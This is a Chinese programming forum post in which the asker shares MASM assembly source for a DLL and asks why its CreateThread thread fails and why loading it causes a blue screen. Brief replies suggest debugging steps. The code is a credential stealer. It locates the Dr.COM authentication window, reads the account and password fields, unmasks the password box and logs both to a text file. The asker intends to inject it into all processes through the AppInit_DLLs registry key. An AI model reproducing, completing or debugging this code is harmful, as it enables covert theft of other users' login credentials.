CreateThread创建的线程为何无法正常运行？
.386
.model flat, stdcall
option casemap :none
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
; Include 文件定义
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
includewindows.inc
includeuser32.inc
includelibuser32.lib
includekernel32.inc
includelibkernel32.lib
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
; #########################################################################

szText MACRO Name, Text:VARARG
LOCAL lbl
jmp lbl
Name db Text,0
lbl:
ENDM

m2m MACRO M1, M2
push M2
pop M1
ENDM

return MACRO arg
mov eax, arg
ret
ENDM
; #########################################################################
.data

szCaption db 'szCaption ',0
szClaStat db 'Static ',0
szClaEdit db 'Edit ',0
szTitAcc db '用户帐号 ',0
szTitPsw db ' 密 码 ',0
szLog db 'DrcomPsw.txt ',0
szDestClass db '#32770 ',0;目标窗口的窗口类
szDrCaption db 'Dr.COM 用户认证程序 ',0


.data?
hInstance dd ?
hdrcom dd ?
hEditAcc dd ?
hEditPsw dd ?
hFile dd ?
hFind dd ?
oldWndPrc dd ?
idTimer dd ?

szPsw db 255 dup(?)
szAcc db 255 dup(?)
ThreadID DWORD ?

.const
szLogtxtdb '帐号：%s ',0dh,0ah
db '密码：%s ',0dh,0ah,0
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
.code
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
;保存密码到DrcomPsw.txt文件
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
_SavePassproc

local @szBuffer[35]:byte,@dwBytesWrite

invoke RtlZeroMemory,addr @szBuffer,sizeof @szBuffer
invoke wsprintf,addr @szBuffer,addr szLogtxt,addr szAcc,addr szPsw
invoke CreateFile,addr szLog,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
invoke WriteFile,hFile,addr @szBuffer,35,addr @dwBytesWrite,NULL
invoke CloseHandle,hFile

xor eax, eax
ret
_SavePassendp
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
; 得到登陆窗口中帐号和密码框的句柄
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
_FoundDrocmproc_hWnd,_uMsg,_idEvent,_dwTime

invokeFindWindow,addr szDestClass,addr szDrCaption
.ifeax
movhdrcom,eax
.endif

.if hdrcom

invoke FindWindowEx,hdrcom,NULL,addr szClaStat,addr szTitAcc

.if eax
invoke FindWindowEx,hdrcom,eax,addr szClaEdit,NULL
mov hEditAcc,eax
invoke SendMessage, hEditAcc, WM_GETTEXT, 255, addr szAcc
.endif

invoke FindWindowEx,hdrcom,NULL,addr szClaStat,addr szTitPsw
.if eax
invoke FindWindowEx,hdrcom,eax,addr szClaEdit,NULL
mov hEditPsw,eax
invoke PostMessage,hEditPsw,EM_SETPASSWORDCHAR,0,0
invoke SendMessage, hEditPsw, WM_GETTEXT, 255, addr szPsw
.endif

.endif

invoke _SavePass

xor eax, eax
ret

_FoundDrocmendp
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
; 设置一个TIMER
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
_FindDrocmproc

invoke SetTimer,NULL,NULL,100,addr _FoundDrocm
mov idTimer,eax
xor eax, eax
ret

_FindDrocmendp
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
; 设置一个TIMER
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
_Killtimerproc

invokeKillTimer,NULL,idTimer
xor eax, eax

ret

_Killtimerendp
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
_GetPsw proc

;关键！！返回密码！（前提是密码必须放在共享段！）
lea eax, szPsw
ret

_GetPsw endp
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
_GetAcc proc

;关键！！返回密码！（前提是帐户必须放在共享段！）
lea eax, szAcc
ret

_GetAcc endp
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
; dll 的入口函数
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
DllEntryproc_hInstance,_dwReason,_dwReserved

push_hInstance
pophInstance

szText LmTitle, "tstdll 's LibMain Function "

.if _dwReason == DLL_PROCESS_ATTACH
szText ATTACHPROCESS, "PROCESS_ATTACH "
invoke DisableThreadLibraryCalls,hInstance
invoke CreateThread,NULL,0,addr _FindDrocm,0,0,addr ThreadID

mov hFind,eax

return TRUE
; -----------------------------
; If error at startup, return 0
; System will abort loading DLL
; -----------------------------

.elseif _dwReason == DLL_PROCESS_DETACH

szText DETACHPROCESS, "PROCESS_DETACH "
.if hFind
invoke TerminateThread,hFind,0
.endif
invoke MessageBox,NULL,addr DETACHPROCESS,addr LmTitle,MB_OK

.elseif _dwReason == DLL_THREAD_ATTACH
szText ATTACHTHREAD, "THREAD_ATTACH "
invoke MessageBox,NULL,addr ATTACHTHREAD,addr LmTitle,MB_OK

.elseif _dwReason == DLL_THREAD_DETACH
szText DETACHTHREAD, "THREAD_DETACH "
invoke MessageBox,NULL,addr DETACHTHREAD,addr LmTitle,MB_OK

.endif

moveax,TRUE
ret

DllEntryEndp
;> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
EndDllEntry

我本意是写一个DLL，然后添加到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] "AppInit_DLLs "里。
可是添加进去就蓝屏。
另外CreateThread创建的线程总是无法运行。真晕了。如果用一个程序调用 _FindDrocm就可以。


[解决办法]
自己远程单步调试一下
[解决办法]
OS蓝屏么？分析一下崩溃转储
[解决办法]
_beginthreadex
[解决办法]
RemoteDebugging, Load Symbols